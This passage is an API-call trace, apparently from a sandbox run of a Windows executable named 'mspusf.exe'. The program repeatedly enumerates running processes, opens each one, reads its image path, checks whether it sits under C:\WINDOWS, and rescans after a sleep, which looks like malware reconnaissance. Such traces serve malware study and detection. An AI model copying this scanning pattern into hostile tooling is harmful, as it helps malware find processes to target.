dwProcessId=0x5e8) returned 0x0 [0080.755] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.756] GetCurrentProcessId () returned 0xf00 [0080.756] GetCurrentProcess () returned 0xffffffff [0080.756] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.756] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0080.756] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0080.756] GetCurrentProcessId () returned 0xf00 [0080.756] GetCurrentProcess () returned 0xffffffff [0080.757] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.757] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0080.757] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0080.757] GetCurrentProcessId () returned 0xf00 [0080.757] GetCurrentProcess () returned 0xffffffff [0080.757] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.757] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x434 [0080.757] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0080.758] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0080.758] CloseHandle (hObject=0x434) returned 1 [0080.758] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.759] GetCurrentProcessId () returned 0xf00 [0080.759] GetCurrentProcess () returned 0xffffffff [0080.759] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.759] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x434 [0080.759] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0080.759] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0080.759] CloseHandle (hObject=0x434) returned 1 [0080.759] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0080.760] GetCurrentProcessId () returned 0xf00 [0080.760] GetCurrentProcess () returned 0xffffffff [0080.760] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.760] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x434 [0080.760] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0080.760] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0080.760] CloseHandle (hObject=0x434) returned 1 [0080.760] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0080.761] GetCurrentProcessId () returned 0xf00 [0080.761] GetCurrentProcess () returned 0xffffffff [0080.761] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.761] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0080.761] GetCurrentProcessId () returned 0xf00 [0080.761] GetCurrentProcess () returned 0xffffffff [0080.761] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.761] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0080.761] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0080.762] GetCurrentProcessId () returned 0xf00 [0080.762] GetCurrentProcess () returned 0xffffffff [0080.762] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.762] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0080.762] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0080.762] GetCurrentProcessId () returned 0xf00 [0080.762] GetCurrentProcess () returned 0xffffffff [0080.762] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.762] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0080.762] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0080.763] GetCurrentProcessId () returned 0xf00 [0080.763] GetCurrentProcess () returned 0xffffffff [0080.763] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.763] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x434 [0080.763] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0080.763] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0080.763] CloseHandle (hObject=0x434) returned 1 [0080.763] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0080.764] GetCurrentProcessId () returned 0xf00 [0080.764] GetCurrentProcess () returned 0xffffffff [0080.764] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.764] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x434 [0080.764] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0080.764] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0080.764] CloseHandle (hObject=0x434) returned 1 [0080.764] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0080.765] GetCurrentProcessId () returned 0xf00 [0080.765] GetCurrentProcess () returned 0xffffffff [0080.765] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.765] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x434 [0080.765] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0080.765] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0080.765] CloseHandle (hObject=0x434) returned 1 [0080.765] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0080.766] GetCurrentProcessId () returned 0xf00 [0080.766] GetCurrentProcess () returned 0xffffffff [0080.766] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.766] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0080.766] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0080.766] GetCurrentProcessId () returned 0xf00 [0080.766] GetCurrentProcess () returned 0xffffffff [0080.766] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.766] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0080.766] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0080.767] GetCurrentProcessId () returned 0xf00 [0080.767] GetCurrentProcess () returned 0xffffffff [0080.767] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.767] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0080.767] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0080.767] GetCurrentProcessId () returned 0xf00 [0080.767] GetCurrentProcess () returned 0xffffffff [0080.767] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.768] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x434 [0080.768] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0080.768] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0080.768] CloseHandle (hObject=0x434) returned 1 [0080.768] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0080.768] GetCurrentProcessId () returned 0xf00 [0080.768] GetCurrentProcess () returned 0xffffffff [0080.768] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.768] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12dc) returned 0x0 [0080.768] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0080.769] GetCurrentProcessId () returned 0xf00 [0080.769] GetCurrentProcess () returned 0xffffffff [0080.769] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.769] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12e4) returned 0x0 [0080.769] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0080.769] GetCurrentProcessId () returned 0xf00 [0080.769] GetCurrentProcess () returned 0xffffffff [0080.770] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.770] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x130c) returned 0x0 [0080.770] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0080.770] GetCurrentProcessId () returned 0xf00 [0080.770] GetCurrentProcess () returned 0xffffffff [0080.770] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.770] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1314) returned 0x434 [0080.770] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" (normalized: "c:\\windows\\system32\\apphostregistrationverifier.exe")) returned 0x33 [0080.770] StrStrIW (lpFirst="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\AppHostRegistrationVerifier.exe" [0080.770] CloseHandle (hObject=0x434) returned 1 [0080.770] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x131c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0080.771] GetCurrentProcessId () returned 0xf00 [0080.771] GetCurrentProcess () returned 0xffffffff [0080.771] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.771] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x131c) returned 0x0 [0080.771] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x135c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x130c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0080.771] GetCurrentProcessId () returned 0xf00 [0080.771] GetCurrentProcess () returned 0xffffffff [0080.771] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.772] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x135c) returned 0x0 [0080.772] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x12e4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0080.772] GetCurrentProcessId () returned 0xf00 [0080.772] GetCurrentProcess () returned 0xffffffff [0080.772] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.772] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1364) returned 0x0 [0080.772] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mspusf.exe")) returned 1 [0080.773] GetCurrentProcessId () returned 0xf00 [0080.773] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0080.773] GetCurrentProcessId () returned 0xf00 [0080.773] GetCurrentProcess () returned 0xffffffff [0080.773] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.773] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x704) returned 0x434 [0080.773] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")) returned 0x1f [0080.773] StrStrIW (lpFirst="C:\\Windows\\System32\\conhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\conhost.exe" [0080.773] CloseHandle (hObject=0x434) returned 1 [0080.773] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0080.774] GetCurrentProcessId () returned 0xf00 [0080.774] GetCurrentProcess () returned 0xffffffff [0080.774] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.774] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xafc) returned 0x0 [0080.774] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0080.775] GetCurrentProcessId () returned 0xf00 [0080.775] GetCurrentProcess () returned 0xffffffff [0080.775] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0080.775] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xf78) returned 0x434 [0080.775] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe")) returned 0x1f [0080.775] StrStrIW (lpFirst="C:\\Windows\\System32\\dllhost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\dllhost.exe" [0080.775] CloseHandle (hObject=0x434) returned 1 [0080.775] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0080.775] CloseHandle (hObject=0x430) returned 1 [0080.775] Sleep (dwMilliseconds=0x3a98) [0090.791] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x464 [0090.797] Process32FirstW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0090.797] GetCurrentProcessId () returned 0xf00 [0090.797] GetCurrentProcess () returned 0xffffffff [0090.797] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.797] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0090.797] Process32NextW (in: hSnapshot=0x464, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0090.798] GetCurrentProcessId () returned 0xf00 [0090.798] GetCurrentProcess () returned 0xffffffff [0090.798] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0090.798] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0090.798] Process32NextW (in: hSnapshot=0x464, 